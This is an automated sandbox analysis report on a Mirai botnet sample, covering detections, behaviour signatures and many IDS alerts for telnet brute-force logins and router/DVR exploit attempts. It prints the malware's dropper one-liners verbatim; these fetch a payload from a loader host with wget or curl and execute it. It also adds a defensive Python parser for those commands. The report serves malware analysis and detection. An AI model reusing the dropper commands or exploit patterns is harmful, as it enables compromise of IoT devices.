Analysis Report rIbyGX66Op

Overview

General Information

Sample Name: rIbyGX66Op
Analysis ID: 397469
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai (3 matches)
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: rIbyGX66Op Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: rIbyGX66Op Virustotal: Detection: 68%
Source: rIbyGX66Op Metadefender: Detection: 51%
Source: rIbyGX66Op ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper
Source: rIbyGX66Op String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: rIbyGX66Op String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: rIbyGX66Op String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
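The string above is the shell one-liner the bot sends to a freshly compromised device. It tries to create a file named .x in seven candidate directories and cd's into the first one that is writable, fetches the payload with wget, then curl, then BusyBox wget, and if chmod 777 fails it copies /bin/ls (already executable) and overwrites the copy's contents with the payload so the mode bits carry over. The Python below is an added example, not code from the report or from the sample: it parses both templates exactly as they appear above and extracts the directory probe list, the downloader fallback order, the payload name and the launch command, then lists the reasons a command like this should be treated as a dropper. No loader host or port is assumed; the %s:%d placeholders are left untouched.

```python
import re
from dataclasses import dataclass

# Both templates are copied verbatim from the "multi-platform dropper" strings
# in this report. The %s:%d placeholders are the loader host and port that the
# bot fills in at runtime; they are left as-is here, nothing is assumed.
DROPPER_BINARY = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;"
    "chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'"
)
DROPPER_SCRIPT = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;"
    "chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);"
    "sh bin.sh %s;/bin/busybox echo -e '%s'"
)


@dataclass
class DropperProfile:
    probe_dirs: list       # directories probed with ">dir/.x", in the order tried
    downloaders: list      # fetch commands in fallback order (wget, curl, busybox wget)
    payload: str           # file name requested from the loader
    chmod_fallback: bool   # True if it copies /bin/ls to inherit +x when chmod fails
    launch: str            # command used to start the payload


# ">/var/run/.x&&cd /var/run" -> "/var/run": a writability probe followed by cd
PROBE_RE = re.compile(r">(/[\w/.-]+)/\.x&&cd ")
# "wget URL", "curl -O URL" or "/bin/busybox wget URL"; URL ends at space, ';' or '|'
FETCH_RE = re.compile(r"((?:/bin/busybox )?wget|curl -O) (http://[^\s;|]+)")
# the command right after the ")" that closes the chmod fallback group
LAUNCH_RE = re.compile(r"\);([^;]+);")


def parse_dropper(cmd: str) -> DropperProfile:
    fetches = FETCH_RE.findall(cmd)
    urls = [u for _, u in fetches]
    m = LAUNCH_RE.search(cmd)
    return DropperProfile(
        probe_dirs=PROBE_RE.findall(cmd),
        downloaders=[tool for tool, _ in fetches],
        payload=urls[0].rsplit("/", 1)[-1] if urls else "",
        # "cp /bin/ls ii; cat i>ii" truncates ii in place, so it keeps ls's mode
        # bits (+x) while its contents become the payload: chmod is never needed.
        chmod_fallback="cp /bin/ls" in cmd,
        launch=m.group(1).strip() if m else "",
    )


def dropper_indicators(p: DropperProfile) -> list:
    """Behavioural reasons to treat a shell command as an IoT dropper."""
    reasons = []
    if len(p.probe_dirs) >= 3:
        reasons.append("probes %d directories for a writable one" % len(p.probe_dirs))
    if len(p.downloaders) >= 2:
        reasons.append("falls back across %s" % ", ".join(p.downloaders))
    if p.chmod_fallback:
        reasons.append("copies /bin/ls to get an executable file when chmod fails")
    if p.launch.startswith(("./", "sh ")):
        reasons.append("launches fetched payload %s via %r" % (p.payload, p.launch))
    return reasons


if __name__ == "__main__":
    for cmd in (DROPPER_BINARY, DROPPER_SCRIPT):
        profile = parse_dropper(cmd)
        print(profile.payload, profile.launch, *dropper_indicators(profile), sep="\n  ")
```

The same parser works on commands captured by a telnet honeypot or a shell audit log once the bot has filled in the loader address; the URL list it extracts is then a direct download IOC, and the seven probe directories are where to look for the dropped payload on a compromised device.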
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/rIbyGX66Op (PID: 4601) Opens: /proc/net/route (opened twice)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.77.238.132: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.247.73: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.22.139: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 122.228.249.221: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43610
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.146.9: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43620
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 95.211.103.19: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.167.77: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.76.41.4: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.16.5.51: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 121.127.240.171: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.244.147.91: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.66.240.0: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43626
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.251.124: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.11.12.82: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.56.185.133: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.12.212.10: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36484 -> 34.90.159.216:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36484 -> 34.90.159.216:80
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43664
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.220.105: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.143.229.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43914
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43922
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43936
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43938
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 45.66.122.140: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43974
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.44.132.119: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.229.122: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 184.105.35.86: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 187.9.231.26: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44216
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.168.227.106: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.204.138.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.77.64.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44220
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.203.134.203: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 63.143.96.217:8000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44244
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.224.12.236: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 197.13.3.22: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.44.112.190: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.83.146:58148 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44250
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 218.86.84.189:1111 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 209.51.191.242: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.17.32.41: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44512
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 115.114.112.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44532
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.128:22104 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.59.151.184: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 119.253.14.61: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 151.177.190.108:4000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.71:16802 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.242.113:58745 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.59.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.35.102.107: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 78.133.138.166: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 47.104.191.32:4748 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.217.98.171: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 187.103.124.110: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.43.107.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.95.211.247: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.231.144.28: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.213.211.120: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.54.120.139: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.215.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.12.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.167.25: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.255.195.11: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.208.68.59: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 109.206.193.130: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 47.229.50.113: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.131.13.8: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 201.10.209.246: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38662 -> 193.176.117.172:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38662 -> 193.176.117.172:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.135.233.46: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.170.129.57: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.181: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54674
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54678
Source: Traffic Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.20:54678 -> 86.125.215.125:23
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54680
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54682
Source: Traffic Snort IDS: 2023443 ET TROJAN Possible Linux.Mirai Login Attempt (klv123) 192.168.2.20:54682 -> 86.125.215.125:23
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54684
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54722
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54730
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.227.188.172: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54734
Source: Traffic Snort IDS: 2023439 ET TROJAN Possible Linux.Mirai Login Attempt (hi3518) 192.168.2.20:54734 -> 86.125.215.125:23
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.91.11.89: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54946
Source: Traffic Snort IDS: 2023436 ET TROJAN Possible Linux.Mirai Login Attempt (anko) 192.168.2.20:54946 -> 86.125.215.125:23
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56306 -> 159.138.143.231:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56306 -> 159.138.143.231:80
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54956
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.54.37.162: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.196.195.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54968
Source: Traffic Snort IDS: 2023434 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0vizxv) 192.168.2.20:54968 -> 86.125.215.125:23
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54970
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54976
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54978
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.165.153.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54980
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 208.126.19.231: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 68.115.35.242: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 107.165.48.81: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.89.78.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.221.96.235: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38558 -> 216.92.218.45:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38558 -> 216.92.218.45:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.144.22.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.165.152: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.167.170: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.223.209.67: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.234.234.92: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.39.200.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 200.155.33.253: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.211.141.231: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.231.46.84: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 92.61.32.163: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.99.69: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 114.231.120.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.142.250.140: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 10.220.105.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50210 -> 23.6.11.241:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50210 -> 23.6.11.241:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.11.241:80 -> 192.168.2.20:50210
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.72.254.150: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.206.175.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 141.64.0.6: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.26.181.228:8080 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.142.250.149: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.94.155: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:50454 -> 69.195.90.130:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:50454 -> 69.195.90.130:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57946 -> 184.29.252.151:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57946 -> 184.29.252.151:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.29.252.151:80 -> 192.168.2.20:57946
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.230.193.38: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41912 -> 52.192.234.143:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41912 -> 52.192.234.143:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.37.98.208: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.154.84.219: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33260 -> 3.11.29.16:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41564 -> 120.25.215.76:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41564 -> 120.25.215.76:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35870 -> 47.108.201.233:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35870 -> 47.108.201.233:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.201.101.67: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.132.248.162: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38446 -> 156.244.87.14:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38446 -> 156.244.87.14:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.215.27.127: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.164.160.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.138.217:65176 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.117.123.50: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.77.221.73: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53946 -> 142.92.252.36:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53946 -> 142.92.252.36:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.39.15: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.116.90.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.161.95.20: -> 192.168.2.20:
